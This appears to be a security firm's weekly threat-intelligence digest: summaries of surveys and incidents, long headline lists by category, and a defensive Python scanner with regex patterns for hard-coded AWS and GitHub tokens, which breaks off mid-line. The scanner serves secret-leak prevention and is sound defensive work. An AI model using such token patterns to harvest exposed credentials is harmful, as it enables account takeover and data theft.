New research by the International Cyber Expo reveals that over 70% of Britons believe cyber warfare is the next frontier in modern combat. Cyber attacks targeting critical infrastructure are the top concern, with 54% of respondents expressing worry. Nearly a third (31%) of the public admit feeling scared about the prospect of cyber warfare, and 43% are concerned about nation-state activities. The survey highlighted that despite government investments in traditional military forces, the majority perceive cyberspace as the emerging battlefield. Experts emphasise the need for increased awareness, preparedness, and investment in cyber security to protect critical infrastructure and national security.
The Rising Cost of Vulnerable APIs and Bot Attacks – A $186 Billion Wake-Up Call for Businesses
A recent report by a cyber security solutions provider, Imperva, has found that vulnerable APIs and automated bot attacks are causing significant financial losses for businesses, with an estimated annual economic burden of up to $186 billion. An API, or Application Programming Interface, is like a bridge that allows different software applications to talk to each other and share information. A bot is a computer program that performs tasks automatically, often mimicking human actions. The study, which analysed over 161,000 cyber security incidents, revealed that the average enterprise managed 613 API endpoints in 2023, making them increasingly attractive targets for cyber criminals. Bot-related security incidents have surged dramatically, rising by 88% in 2022 and a further 28% in 2023. Insecure APIs alone have led to up to $87 billion in losses annually, marking a $12 billion increase from 2021. Automated API abuse by bots contributes significantly to this impact, costing organisations up to $17.9 billion each year. The report underscores the urgent need for robust security measures to protect against these growing threats.
Attackers are Exploiting Vulnerabilities at a Record Pace—Here’s What to Do About It
Recent findings show that attackers are exploiting vulnerabilities faster than ever, with the average time to exploitation now just 4.76 days—a 43% increase in speed compared to earlier this year. This rapid escalation emphasises the critical need for timely patching, yet 86% of breaches occurred through known vulnerabilities with available patches. 98% of organisations reported detecting exploits of vulnerabilities over five years old, underscoring the importance of strong cyber hygiene practices. Experts advise prioritising vulnerabilities actively under attack and ensuring robust incident response plans. Collaboration between public and private sectors is deemed essential to enhance cyber security and stay ahead of evolving threats.
What Can Businesses Learn from the Rise of Cyber Espionage?
Cyber espionage is becoming a critical concern for businesses, as state-sponsored attacks increasingly target the private sector to disrupt economies and access confidential information. The UK GCHQ estimates that at least 34 nation-states now have advanced cyber espionage teams. The rise of AI technologies has amplified these threats, with attackers using tools like large language models to enhance their capabilities. Attacks on major cloud providers pose significant risks due to their impact on software supply chains. While AI introduces new risks, it is also essential for improving threat detection and response. Organisations are urged to adopt zero trust architectures, conduct regular security audits, and strategically incorporate AI to protect against sophisticated cyber threats.
When Startup Founders Should Start Thinking About Cyber Security
A recent discussion has highlighted that cyber security risks pose a significant threat to startups, yet many founders prioritise rapid growth over security measures. Advanced persistent threats like China's Volt Typhoon have begun targeting startups, with one such attack breaching Versa Networks after exploiting a high-severity vulnerability. According to a survey by a business insurance company, over two-thirds of startup founders have experienced a cyber attack, with 86% owning some form of cyber insurance and 71% considering additional security measures. Despite this, investors seldom prioritise cyber security during negotiations, but the consequences of neglecting it can be catastrophic. Experts suggest that as startups expand, the importance of cyber security increases, and founders should integrate security planning from the outset to mitigate risks.
Sources:
https://www.infosecurity-magazine.com/news/half-of-uk-firms-lack-basic/
https://www.itsecurityguru.org/2024/09/19/beyond-a-buzzword-what-resilience-in-cyber-really-means/
https://www.cio.com/article/3523667/do-boards-understand-their-new-role-in-cybersecurity.html
https://securityboulevard.com/2024/09/threat-actors-continue-to-utilize-hr-related-phishing-tactics/
https://www.helpnetsecurity.com/2024/09/17/robert-ramsey-rain-technology-visual-hacking/
https://www.itsecurityguru.org/2024/09/19/cyber-warfare-a-growing-concern-for-the-british-public/
https://securityintelligence.com/articles/what-can-businesses-learn-from-rise-of-cyber-espionage/
https://www.darkreading.com/cybersecurity-operations/cybersecurity-influence-startup-investment
Governance, Risk and Compliance
The alarming gap between perception and reality in the corner office | TechRadar
Over Half of Breached UK Firms Pay Ransom - Infosecurity Magazine (infosecurity-magazine.com)
Nearly half of UK businesses unequipped to face cyber attacks, Ipsos finds (holyrood.com)
Half of UK Firms Lack Basic Cybersecurity Skills - Infosecurity Magazine (infosecurity-magazine.com)
Do boards understand their new role in cybersecurity? | CIO
Closing the gap between cyber risk strategy and execution (betanews.com)
Beyond A Buzzword: What Resilience in Cyber Really Means - IT Security Guru
Palo Alto Networks CEO says cybersecurity has ‘become an arms race’ – BNN Bloomberg
99% of Business Leaders Are Concerned About Internal Data (darkreading.com)
Fines and lawsuits after data breaches ‘worse than the attack itself’ (foodmanufacture.co.uk)
Better metrics can show how cybersecurity drives business success | CSO Online
It's Time To Dismantle The Long Held Silos Between Security And Tech Teams (forbes.com)
The Cybersecurity Landscape: New Threats, Same Mistakes (darkreading.com)
The Cost Of Inaction: How Breached Organisations Are Redefining Cyber Resilience | Scoop News
Companies aren't 'owning' their data (betanews.com)
SecOps' new frontier in the remote work era: HR | TechTarget
Only 1/3 of businesses have 24/7 security coverage, survey finds | SC Media (scmagazine.com)
Modernization: Nothing to fear except failing to future-proof | ITPro
Striking the balance between cybersecurity and operational efficiency - Help Net Security
What can businesses learn from the rise of cyber espionage? (securityintelligence.com)
Want to get ahead? Four activities that can enable a more proactive security regime | CSO Online
Protecting Critical Data and Infrastructure in the Digital Age | Entrepreneur
The ripple effects of regulatory actions on CISO reporting - Help Net Security
Citigroup strips COO of responsibility for data overhaul after $136mn fine
Threats
Ransomware, Extortion and Destructive Attacks
Over Half of Breached UK Firms Pay Ransom - Infosecurity Magazine (infosecurity-magazine.com)
Top 10 ransomware groups to watch | CSO Online
Infostealers: An Early Warning for Ransomware Attacks (darkreading.com)
Infostealers Cause Surge in Ransomware Attacks - Infosecurity Magazine (infosecurity-magazine.com)
Ransomware attacks: Rising threats and increasing demands - SiliconANGLE
Ransomware attacks are soaring to a new high | TechRadar
Medusa Ransomware Exploiting Fortinet Flaw For Sophisticated Attacks (cybersecuritynews.com)
Gen reveals 24% rise in ransomware attacks on consumers (securitybrief.co.nz)
Ransomware gangs now abuse Microsoft Azure tool for data theft (bleepingcomputer.com)
75 percent of organizations affected more than once by ransomware (betanews.com)
Germany seizes 47 crypto exchanges used by ransomware gangs (bleepingcomputer.com)
What more can be done to stop ransomware attacks? | CyberScoop
Defending Against Ransomware Threats: Tactics and Procedures Revealed by CISA (cimcor.com)
For ransomware, universities are paying more | EdScoop
Vanilla Tempest hackers hit healthcare with INC ransomware (bleepingcomputer.com)
Four ways to stay ahead of the ransomware threat | SC Media (scmagazine.com)
Ransomware Victims
Over Half of Breached UK Firms Pay Ransom - Infosecurity Magazine (infosecurity-magazine.com)
Qilin ransomware attack on Synnovis impacted over 900K patients (securityaffairs.com)
UnitedHealth CISO: We had to ‘start over’ after ransomware attack (cyberscoop.com)
Ascension Suffered $1.3 Billion Hit From Cyberattack, Analysis Finds - KFF Health News
LockBit boasts once again of ransoming eFile.com • The Register
Valencia Ransomware crew 'hits' California city and more • The Register
Vice Society Uses Inc Ransomware in Healthcare Attack (darkreading.com)
Data Stolen in Ransomware Attack That Hit Seattle Airport - SecurityWeek
Rhysida ships off Port of Seattle data for $6M • The Register
German radio station forced to broadcast 'emergency tape' following cyberattack (therecord.media)
Ransomware Group Leaks Data Allegedly Stolen From Kawasaki Motors - SecurityWeek
88,000 Impacted by Access Sports Data Breach Resulting From Ransomware Attack - SecurityWeek
Phishing & Email Based Attacks
Threat Actors Continue to Utilize HR-Related Phishing Tactics - Security Boulevard
Email Attacks a Problem for National Infrastructure Companies (techrepublic.com)
How hackers are using legitimate tools to distribute phishing links | ITPro
Cybercriminals exploit content platforms for phishing attacks (securitybrief.co.nz)
What is email spam and how to fight it? | Definition from TechTarget
North Korean APT Bypasses DMARC for Cyber Espionage (darkreading.com)
DoJ accuses Chinese national of phishing for military code • The Register
Advanced Phishing Attacks Put X Accounts at Risk - Infosecurity Magazine (infosecurity-magazine.com)
What Is Phishing-Resistant MFA and How Does it Work? - Security Boulevard
Other Social Engineering
The growing danger of visual hacking and how to protect against it - Help Net Security
Security Firm's North Korean Hacker Hire Not Unique (darkreading.com)
Windows users targeted with fake human verification pages delivering malware - Help Net Security
New North Korean Social Engineering Campaign Targets Crypto Sector | MSSP Alert
Artificial Intelligence
How are cybercriminals upskilling to make the most of AI? - Raconteur
Companies skip security hardening in rush to adopt AI | CSO Online
The AI Threat: Deepfake or Deep Fake? Unraveling the True Security Risks - SecurityWeek
Security leaders consider banning AI coding due to security risks - Help Net Security
OODA Loop - Attacker VS Defender. Who Will Win the Race to Best Operationalize AI?
Orca: AI services, models falling short on security | TechTarget
Hacker tricks ChatGPT into giving out detailed instructions for making homemade bombs | TechCrunch
Is that photo real or AI? Google's 'About this image' aims to help you tell the difference | ZDNET
Compliance frameworks and GenAI: The Wild West of security standards - Help Net Security
2FA/MFA
How MFA gets hacked — and strategies to prevent it | CSO Online
What Is Phishing-Resistant MFA and How Does it Work? - Security Boulevard
Malware
Infostealers: An Early Warning for Ransomware Attacks (darkreading.com)
Infostealers Cause Surge in Ransomware Attacks - Infosecurity Magazine (infosecurity-magazine.com)
This Harry Potter-Named Attack Runs Fileless Malware (makeuseof.com)
Espionage Alert: Google Sheets Exploit For Malware Control - Security Boulevard
This Windows Tool Can Let In Viruses Without Detection (makeuseof.com)
Hackers Force Chrome Users To Hand Over Google Passwords, Here’s How (forbes.com)
CISA warns of Windows flaw used in infostealer malware attacks (bleepingcomputer.com)
1.3 million Android-based TV boxes backdoored; researchers still don’t know how | Ars Technica
'SambaSpy' RAT's Multiple Features Pack Hefty Punch (darkreading.com)
Windows users targeted with fake human verification pages delivering malware - Help Net Security
Binance Warns of Rising Clipper Malware Attacks Targeting Cryptocurrency Users (thehackernews.com)
Bots/Botnets
Chinese Spies Built Massive Botnet of IoT Devices to Target US, Taiwan Military - SecurityWeek
New "Raptor Train" IoT Botnet Compromises Over 200,000 Devices Worldwide (thehackernews.com)
FBI director says Chinese spies 'burned down' their botnet • The Register
Study: Bots pose major online fraud threat | Chain Store Age
Five Eyes alliance seizes control of extensive spy tech network used by China | TechRadar
How to detect and stop bot activity - Help Net Security
Mobile
14 dead as Hezbollah walkie-talkies explode in second, deadlier attack | Ars Technica
11 dead, thousands injured in explosive supply chain attack on Hezbollah pagers | Ars Technica
Mass pager attack in Lebanon raises concerns over cyber warfare and terrorism · Global Voices
Securing your smartphone: Vital steps to protect your digital assets | TechRadar
Android to be getting its own version of Apple's "Stolen Device Protection" feature - PhoneArena
Watch out! These 9 online banking scams drain your accounts | PCWorld
Here's How to Remotely Disable Your Smartphone If It's Stolen (makeuseof.com)
Denial of Service/DoS/DDOS
Financial services sector remains top DDoS target, Akamai reports (securitybrief.co.nz)
Internet of Things – IoT
Malware has infected 1.3 million Android TV boxes in 197 countries | TechSpot
Chinese Spies Built Massive Botnet of IoT Devices to Target US, Taiwan Military - SecurityWeek
New "Raptor Train" IoT Botnet Compromises Over 200,000 Devices Worldwide (thehackernews.com)
NCSC exposes Chinese company running malicious Mirai botnet | Computer Weekly
FBI director says Chinese spies 'burned down' their botnet • The Register
Data Breaches/Leaks
Fortinet confirms breach that likely leaked 440GB of customer data | CSO Online
Cybersecurity company Fortinet suffers third-party data breach (techmonitor.ai)
23andMe to pay $30 million in genetics data breach settlement (bleepingcomputer.com)
Hackers steal nearly 1.7 million credit card numbers in breach | Mashable
After yet another data breach, how can you protect yourself? (thehill.com)
AT&T agrees to $13 million fine for third-party cloud breach | CyberScoop
This Dating App May Have Leaked Extremely Private Data: Check Your Account Now (makeuseof.com)
Over 1,000 ServiceNow instances found leaking corporate KB data (bleepingcomputer.com)
Temu denies breach after hacker claims theft of 87 million data records (bleepingcomputer.com)
Hackers steal iCloud photos through calendar invites -- no clicks required (appleinsider.com)
Construction firms breached in brute force attacks on accounting software (bleepingcomputer.com)
RansomHub claims Kawasaki cyberattack, threatens to leak stolen data (bleepingcomputer.com)
88,000 Impacted by Access Sports Data Breach Resulting From Ransomware Attack - SecurityWeek
Organised Crime & Criminal Actors
Violent cyber criminals to spend collective 191 years in prison • The Register
Ticketmaster boss who repeatedly hacked rival firm sentenced (bitdefender.com)
'Marko Polo' Creates Globe-Spanning Cybercrime Juggernaut (darkreading.com)
Criminals Keep Hacking Themselves, Letting Researchers Unmask Them (404media.co)
Europol takes down "Ghost" encrypted messaging platform used for crime (bleepingcomputer.com)
The Dark Web Demystified: Its Role In Privacy, Crime, And Regulation – Analysis – Eurasia Review
Tor says it’s "still safe" amid reports of police deanonymizing users (bleepingcomputer.com)
Suspects behind $230 million cryptocurrency theft arrested in Miami (bleepingcomputer.com)
Australian Police conducted supply chain attack on crime app • The Register
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Binance Warns of Rising Clipper Malware Attacks Targeting Cryptocurrency Users (thehackernews.com)
Cryptojacking Gang TeamTNT Make a Comeback - Infosecurity Magazine (infosecurity-magazine.com)
Germany seizes 47 crypto exchanges used by ransomware gangs (bleepingcomputer.com)
Suspects behind $230 million cryptocurrency theft arrested in Miami (bleepingcomputer.com)
Tether and Others Freeze Millions Tied to Lazarus Group Wallets - DailyCoin
New North Korean Social Engineering Campaign Targets Crypto Sector | MSSP Alert
Insider Risk and Insider Threats
Insider threats highlighted, calls for enhanced security measures (securitybrief.co.nz)
How to reduce cyber risk during employee onboarding (bleepingcomputer.com)
Insurance
How Cyber Insurance Shifts Affect the Security Landscape (darkreading.com)
Why Breaking Down Silos Is Key To Optimizing Cyber Insurance Investments
How NIS2 Directive Impacts Businesses and Cyber Insurance (kingsbridge.co.uk)
Supply Chain and Third Parties
How Mega Attacks Are Spotlighting Critical 3rd-Party Risks (govinfosecurity.com)
Qilin ransomware attack on Synnovis impacted over 900K patients (securityaffairs.com)
The ‘Sleeping Time Bomb’ of Third-Party Cybersecurity Risk | Decipher (duo.com)
Post-CrowdStrike Fallout: Microsoft Redesigning EDR Vendor Access to Windows Kernel - SecurityWeek
Fortinet confirms data breach, extortion demand | TechTarget
Why Strong Cybersecurity is the Key to Unlocking the Full Potential of Supply Chains | Entrepreneur
Third-party risk management can learn a lot from the musk ox | CSO Online
Construction firms breached in brute force attacks on accounting software (bleepingcomputer.com)
Concerns Over Supply Chain Attacks on US Seaports Grow (darkreading.com)
Cloud/SaaS
Cloud-Native Network Security Up 17%, Hardware Down 2% (darkreading.com)
Ransomware gangs now abuse Microsoft Azure tool for data theft (bleepingcomputer.com)
AT&T agrees to $13 million fine for third-party cloud breach | CyberScoop
RCE Flaw in Google Cloud Affected Millions of Servers (darkreading.com)
Hackers steal iCloud photos through calendar invites -- no clicks required (appleinsider.com)
How to stop hackers attacking hybrid clouds | ITPro
Outages
1 in 10 firms dump infosec wares after Crowstrike outage • The Register
Post-CrowdStrike Fallout: Microsoft Redesigning EDR Vendor Access to Windows Kernel - SecurityWeek
Will Microsoft Rethink Windows Security? (govinfosecurity.com)
Cloudflare outage cuts off access to websites in some regions (bleepingcomputer.com)
Identity and Access Management
Gateways to havoc: Overprivileged dormant service accounts - Help Net Security
The proliferation of non-human identities - Help Net Security
Beyond human IAM: The rising tide of machine identities - Help Net Security
Encryption
Tor says it’s "still safe" amid reports of police deanonymizing users (bleepingcomputer.com)
Google Chrome Switches to ML-KEM for Post-Quantum Cryptography Defense (thehackernews.com)
Linux and Open Source
What is open-source and how does it benefit you? | ZDNET
Government unveils open-source security steps (baselinemag.com)
Passwords, Credential Stuffing & Brute Force Attacks
TfL requires in-person password resets for 30,000 employees after hack (bleepingcomputer.com)
Why Hackers Aren't Stopped by Account Lockouts | HackerNoon
Hackers Force Chrome Users To Hand Over Google Passwords, Here’s How (forbes.com)
Malware locks browser in kiosk mode to steal Google credentials (bleepingcomputer.com)
Over 2 million VPN passwords have been stolen – here's what you can do about it | TechRadar
Understanding Credential Stuffing Attacks - Security Boulevard
Construction firms breached in brute force attacks on accounting software (bleepingcomputer.com)
Social Media
France uses tough, untested cybercrime law to target Telegram's Durov | Reuters
British MPs and international organisations hacked on X | X | The Guardian
LinkedIn's new search filter aims to protect you from suspicious job postings | ZDNET
Instagram makes 'Teen Accounts' private by default - and AI will be checking your age | ZDNET
Facebook Hit With Class Action Over Spate of Hacked Accounts (bloomberglaw.com)
Meta to Train AI Models Using Public U.K. Facebook and Instagram Posts (thehackernews.com)
Advanced Phishing Attacks Put X Accounts at Risk - Infosecurity Magazine (infosecurity-magazine.com)
Training, Education and Awareness
Regulations, Fines and Legislation
Fines and lawsuits after data breaches ‘worse than the attack itself’ (foodmanufacture.co.uk)
France uses tough, untested cybercrime law to target Telegram's Durov | Reuters
AT&T agrees to $13 million fine for third-party cloud breach | CyberScoop
5 new cybersecurity regulations businesses should know about | MIT Sloan
Citigroup strips COO of responsibility for data overhaul after $136mn fine
The ripple effects of regulatory actions on CISO reporting - Help Net Security
Compliance frameworks and GenAI: The Wild West of security standards - Help Net Security
How NIS2 Directive Impacts Businesses and Cyber Insurance (kingsbridge.co.uk)
Models, Frameworks and Standards
How NIS2 Directive Impacts Businesses and Cyber Insurance (kingsbridge.co.uk)
Data Protection
Careers, Working in Cyber and Information Security
Cyber workforce must almost double to meet global talent need | Computer Weekly
Cyber workforce size stalls despite skills shortages (betanews.com)
UK convenes global coalition to boost cyber skills and tackle growing threats - GOV.UK (www.gov.uk)
The cybersecurity workforce of the future requires diverse hiring practices - Help Net Security
Only 1/3 of businesses have 24/7 security coverage, survey finds | SC Media (scmagazine.com)
Law Enforcement Action and Take Downs
Violent cyber scum to spend collective 191 years in prison • The Register
France uses tough, untested cybercrime law to target Telegram's Durov | Reuters
Tor insists its safe after cops convict CSAM site admin • The Register
Ticketmaster boss who repeatedly hacked rival firm sentenced (bitdefender.com)
UK activists file complaint with police against NSO Group • The Register
Tor says it’s "still safe" amid reports of police deanonymizing users (bleepingcomputer.com)
Europol takes down "Ghost" encrypted messaging platform used for crime (bleepingcomputer.com)
Suspects behind $230 million cryptocurrency theft arrested in Miami (bleepingcomputer.com)
Australian Police conducted supply chain attack on crime app • The Register
Misinformation, Disinformation and Propaganda
Putin really wants to put Trump back in the White House • The Register
US accuses RT, others of covert arms dealing, global influence operations | CyberScoop
Malicious Actors Sow Discord With Election Compromise Claims (darkreading.com)
FBI, CISA Warn of Fake Voter Data Hacking Claims - SecurityWeek
44% of people report believing election-related misinformation - Adobe study | ZDNET
Russian threat groups shift attention to Harris-Walz campaign, researchers find | CyberScoop
Russian troll farms turn up heat on presidential candidates | SC Media (scmagazine.com)
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Mass pager attack in Lebanon raises concerns over cyber warfare and terrorism · Global Voices
Cyber Warfare: A Growing Concern for the British Public - IT Security Guru
What can businesses learn from the rise of cyber espionage? (securityintelligence.com)
Espionage Alert: Google Sheets Exploit For Malware Control - Security Boulevard
Nation State Actors
China
Did a Chinese University Hacking Competition Target a Real Victim? | WIRED
Chinese Spies Built Massive Botnet of IoT Devices to Target US, Taiwan Military - SecurityWeek
Chinese spies spent 4 months in aerospace firm’s server • The Register
New "Raptor Train" IoT Botnet Compromises Over 200,000 Devices Worldwide (thehackernews.com)
FBI director says Chinese spies 'burned down' their botnet • The Register
China suspected of hacking diplomatic body for Pacific islands region (therecord.media)
DoJ accuses Chinese national of phishing for military code • The Register
Chinese gov’t mulls anti-money laundering law to ‘monitor’ new fintech
Chinese boffins claim Starlink signals can defeat stealth • The Register
Temu denies breach after hacker claims theft of 87 million data records (bleepingcomputer.com)
Russia
Putin really wants to put Trump back in the White House • The Register
Despite Russia warnings, critical infrastructure unprepared • The Register
Russian Secret Sub Unit Menaces Undersea Cables - Business Insider
US accuses RT, others of covert arms dealing, global influence operations | CyberScoop
RT News Hosted Russian Cyber Spy Unit, US Says (darkreading.com)
Russian troll farms turn up heat on presidential candidates | SC Media (scmagazine.com)
Malicious Actors Sow Discord With Election Compromise Claims (darkreading.com)
Russian threat groups shift attention to Harris-Walz campaign, researchers find | CyberScoop
'Marko Polo' Creates Globe-Spanning Cybercrime Juggernaut (darkreading.com)
Russian Security Firm Doctor Web Hacked - SecurityWeek
Iran
As Geopolitical Tensions Mount, Iran's Cyber Operations Grow (darkreading.com)
North Korea
Security Firm's North Korean Hacker Hire Not Unique (darkreading.com)
SecOps' new frontier in the remote work era: HR | TechTarget
North Korean APT Bypasses DMARC for Cyber Espionage (darkreading.com)
Tether and Others Freeze Millions Tied to Lazarus Group Wallets - DailyCoin
New North Korean Social Engineering Campaign Targets Crypto Sector | MSSP Alert
The Next US President Needs a New North Korea Strategy | The National Interest
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
11 dead, thousands injured in explosive supply chain attack on Hezbollah pagers | Ars Technica
Explosive Pagers Reveal Major Security Breach Within Hezbollah (armyrecognition.com)
Mass pager attack in Lebanon raises concerns over cyber warfare and terrorism · Global Voices
UK activists file complaint with police against NSO Group • The Register
Key Predator spyware peddlers added to US sanctions list • The Register
Apple Abandons Spyware Suit to Avoid Sharing Cyber Secrets (darkreading.com)
Tools and Controls
Closing the gap between cyber risk strategy and execution (betanews.com)
Beyond A Buzzword: What Resilience in Cyber Really Means - IT Security Guru
1 in 10 firms dump infosec wares after Crowstrike outage • The Register
UK Data Centers Gain Critical Infrastructure Status, Raising Green Belt Controversy - SecurityWeek
Post-CrowdStrike Fallout: Microsoft Redesigning EDR Vendor Access to Windows Kernel - SecurityWeek
Security leaders consider banning AI coding due to security risks - Help Net Security
OODA Loop - Attacker VS Defender. Who Will Win the Race to Best Operationalize AI?
Why Pay A Pentester? (thehackernews.com)
SecOps' new frontier in the remote work era: HR | TechTarget
Over 2 million VPN passwords have been stolen – here's what you can do about it | TechRadar
Better metrics can show how cybersecurity drives business success | CSO Online
It's Time To Dismantle The Long Held Silos Between Security And Tech Teams (forbes.com)
How to reduce cyber risk during employee onboarding (bleepingcomputer.com)
Only 1/3 of businesses have 24/7 security coverage, survey finds | SC Media (scmagazine.com)
Striking the balance between cybersecurity and operational efficiency - Help Net Security
Organizations overwhelmed by numerous and insecure remote access tools - Help Net Security
DNS security best practices to implement now | TechTarget
What is Enterprise Attack Surface Management? | UpGuard
Is that photo real or AI? Google's 'About this image' aims to help you tell the difference | ZDNET
Want to get ahead? Four activities that can enable a more proactive security regime | CSO Online
Other News
When Startup Founders Should Be Thinking About Cybersecurity (darkreading.com)
73% Of Small Businesses Concerned About Cyber Security, New AMI Research Shows | Scoop News
Nearly half of UK businesses unequipped to face cyber attacks, Ipsos finds (holyrood.com)
TfL requires in-person password resets for 30,000 employees after hack (bleepingcomputer.com)
BT Report HUGE Rise in Malicious IP Scanners Across UK Network - ISPreview UK
The Cybersecurity Landscape: New Threats, Same Mistakes (darkreading.com)
Why are utilities especially vulnerable to cyberattacks? - Digital Journal
Increased Cybersecurity Essential For NGOs: Help Available (forbes.com)
Healthcare's Diagnosis is Critical: The Cure is Cybersecurity Hygiene (thehackernews.com)
Cybercrime in the Education Sector | MSSP Alert
Cyberattacks Are Huge Threat for All Manufacturers | ASSEMBLY (assemblymag.com)
Ports need to prepare for cyber attacks | News | Port Strategy
The rising threat of cyberattacks in the restaurant industry (securityintelligence.com)
Hospitality & Travel Cybersecurity: Protection the During Peak Seasons - Security Boulevard
Cyber threats to shipping explained | Pen Test Partners
Cybersecurity in the Skies - Avionics International (aviationtoday.com)
Vulnerability Management
Attackers are exploiting vulnerabilities at a record pace—here’s what to do about it | CSO Online
Insecure software makers are the real cyber villains – CISA • The Register
Patch management: A dull IT pain that won’t go away | CSO Online
The Ultimate Unseen Vulnerability in Addressing Cybersecurity Threats: Communication | HackerNoon
Is Microsoft really going to cut off security updates for your 'unsupported' Windows 11 PC? | ZDNET
CISA Releases Analysis of FY23 Risk and Vulnerability Assessments | CISA
Detecting vulnerable code in software dependencies is more complex than it seems - Help Net Security
The line between citizen developers and IT pros gets fuzzier - is that a problem? | ZDNET
Vulnerabilities
More details on that Windows Installer 'make me admin' hole • The Register
CISA warns of Windows flaw used in infostealer malware attacks (bleepingcomputer.com)
Google Chrome 129: new features and security fixes arrive on all platforms - gHacks Tech News
1 PoC Exploit for RCE Flaw, but 2 Patches From Veeam (darkreading.com)
Microsoft confirms second 0-day exploited by Void Banshee APT (CVE-2024-43461) - Help Net Security
SolarWinds Issues Patch for Critical ARM Vulnerability Enabling RCE Attacks (thehackernews.com)
Patch Issued for Critical VMware vCenter Flaw Allowing Remote Code Execution (thehackernews.com)
Medusa Ransomware Exploiting Fortinet Flaw For Sophisticated Attacks (cybersecuritynews.com)
VMware Releases Security Advisory for VMware Cloud Foundation and vCenter Server | CISA
Apple Vision Pro Vulnerability Exposed Virtual Keyboard Inputs to Attackers (thehackernews.com)
Windows vulnerability abused braille “spaces” in zero-day attacks (bleepingcomputer.com)
SolarWinds fixed critical RCE CVE-2024-28991 in Access Rights Manager (securityaffairs.com)
D-Link addressed three critical RCE in wireless router models (securityaffairs.com)
Apple Patches Major Security Flaws With iOS 18 Refresh - SecurityWeek
GitLab releases security updates to fix 17 vulnerabilities | Security Magazine
RCE Flaw in Google Cloud Affected Millions of Servers (darkreading.com)
Is Microsoft really going to cut off security updates for your 'unsupported' Windows 11 PC? | ZDNET
Atlassian Patches Vulnerabilities in Bamboo, Bitbucket, Confluence, Crowd - SecurityWeek
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Briefing 13 September 2024
Black Arrow Cyber Threat Intelligence Briefing 13 September 2024:
-Trustwave Report Highlights Critical Cyber Threats to Financial Services Sector
-Old Habits, New Threats, Why More Phishing Attacks are Bypassing Technical Controls
-Prolific Threat Actor Group Scattered Spider Sets Sights on Finance, Insurance Firms’ Cloud Infrastructure
-Cyber Criminals Target Smaller Firms as Larger Companies Beef Up Security
-The Rise of Deepfakes Means CEOs Need to Rethink Trust
-What now? Ransomware Victim Pays Hacker, but Decryption Key Fails
-UK Regulator to Significantly Reduce Maximum Fraud Losses Banks are Forced to Cover
-Enterprise Mobile Devices See Increased Attacks
-Business Email Compromise Costs $55bn Over a Decade
-Half of IT Decision Makers Have Had to Recover Data from a Backup with a Third Unable to Make Full Recovery
-Insurers and Asset Managers Continue to Invest in Longer Term Cyber Security Planning: Moody’s
-Russia's Top-Secret Military Unit Reportedly Plots Undersea Cable 'Sabotage’
-Think You Could Never Fall Victim to Cyber Crime? Think Again
Welcome to this week’s Black Arrow Cyber Threat Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Top Cyber Stories of the Last Week
Trustwave Report Highlights Critical Cyber Threats to Financial Services Sector
Trustwave's latest research highlights significant cyber security challenges for the financial services sector, with ransomware and phishing emerging as major threats. The report found that 49% of attacks on financial institutions originated from phishing, while 24% of ransomware incidents were linked to a single threat actor group. Insider threats also pose a substantial risk, identified as the most costly type of data breach. The US was most affected, with 65% of ransomware attacks targeting its financial services. Trustwave emphasises the need for robust defences against these growing threats that include phishing-as-a-service and insider-driven breaches.
Old Habits, New Threats, Why More Phishing Attacks are Bypassing Technical Controls
Trust in Secure Email Gateways (SEGs) is waning, with 91% of cyber security leaders expressing frustration due to the increasing sophistication of phishing attacks. In the first quarter of 2024, 52% more attacks bypassed SEG detection, exploiting limitations in signature-based and reputation-based technologies. Techniques such as polymorphic attacks, compromised accounts, and social engineering have proven effective at evading legacy systems. With 68% of successful attacks passing all verification checks, experts recommend transitioning to integrated cloud email security solutions using AI and behavioural detection to better counter modern threats.
Prolific Threat Actor Group Scattered Spider Sets Sights on Finance, Insurance Firms’ Cloud Infrastructure
Scattered Spider, a hacking group targeting the finance and insurance sectors, has intensified attacks on corporate cloud systems for data exfiltration and extortion, according to SC Media. The group harvests cloud access tokens exposed on platforms such as GitHub and buys stolen credentials, focusing on services such as Microsoft Entra ID, AWS EC2 and Okta. Smishing (SMS phishing) campaigns have also been used to gain initial access, after which the attackers demand ransoms and resell the compromised credentials. Urgent implementation of multi-factor authentication and phishing awareness programmes is recommended, alongside removing hard-coded access tokens from developers' code.
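The exposed-token problem described above, as an added example that is not part of the Black Arrow briefing or SC Media's reporting: a small Python pre-commit style scanner that flags hard-coded cloud access tokens before they reach a repository. The AWS access key ID and GitHub token prefixes follow the vendors' documented formats; the AWS secret-key rule is a looser heuristic keyed on the variable name, and the sample file contents are constructed for this example (none are live credentials).

```python
"""Scan source text for hard-coded cloud access tokens.

Added example: not Black Arrow's or SC Media's code. AWS access key ID and
GitHub prefixes are documented formats; the secret-key rule is a heuristic
(assumption) and the SAMPLE below is constructed, not real credentials.
"""
import re
import sys
from dataclasses import dataclass
from pathlib import Path

PATTERNS = {
    # AWS long-term (AKIA) and temporary (ASIA) access key IDs: prefix + 16 chars
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    # Heuristic (assumption): a 40-char base64-like value assigned to an
    # aws_secret_access_key-style variable name; tune for your codebase
    "aws_secret_access_key": re.compile(
        r"(?i)aws[_-]?secret[_-]?(?:access[_-]?)?key\W{0,5}"
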